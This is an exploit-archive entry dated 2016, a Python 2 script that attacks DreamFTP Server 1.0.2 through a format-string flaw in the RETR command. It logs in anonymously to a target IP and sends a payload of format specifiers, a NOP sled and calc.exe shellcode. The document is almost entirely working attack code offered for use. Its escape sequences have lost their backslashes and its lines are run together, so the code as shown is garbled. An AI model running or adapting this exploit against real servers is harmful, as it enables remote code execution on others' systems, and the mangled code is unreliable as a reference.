BolinTech DreamFTP 1.02 RETR Buffer Overflow
Posted on 05 November 2016
import socket import os import sys print ''' ############################################## # Created: ScrR1pTK1dd13 # # Name: Greg Priest # # Mail: ScrR1pTK1dd13.slammer@gmail.com # ############################################## # Exploit Title: DreamFTPServer1.0.2_RETR_command_format_string_remotecodevuln # Date: 2016.11.04 # Exploit Author: Greg Priest # Version: DreamFTPServer1.0.2 # Tested on: Windows7 x64 HUN/ENG Professional ''' ip = raw_input("Target ip: ") port = 21 overflow = '%8x%8x%8x%8x%8x%8x%8x%8x%341901071x%n%8x%8x%24954x%n%x%x%x%n' nop = 'x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90' #overflow = '%8x%8x%8x%8x%8x%8x%8x%8x%341901090x%n%8x%8x%24954x%n%x%x%x%nx90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90' #shellcode calc.exe shellcode =( "x31xdbx64x8bx7bx30x8bx7f" + "x0cx8bx7fx1cx8bx47x08x8b" + "x77x20x8bx3fx80x7ex0cx33" + "x75xf2x89xc7x03x78x3cx8b" + "x57x78x01xc2x8bx7ax20x01" + "xc7x89xddx8bx34xafx01xc6" + "x45x81x3ex43x72x65x61x75" + "xf2x81x7ex08x6fx63x65x73" + "x75xe9x8bx7ax24x01xc7x66" + "x8bx2cx6fx8bx7ax1cx01xc7" + "x8bx7cxafxfcx01xc7x89xd9" + "xb1xffx53xe2xfdx68x63x61" + "x6cx63x89xe2x52x52x53x53" + "x53x53x53x53x52x53xffxd7") remotecode = overflow + nop + shellcode + ' ' s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) connect=s.connect((ip ,port)) s.recv(1024) s.send('USER anonymous ') s.recv(1024) s.send('PASSW hacker@hacker.net ') s.recv(1024) print remotecode print ''' Successfull Exploitation! ''' message = 'RETR ' + remotecode s.send(message) s.recv(1024) s.close
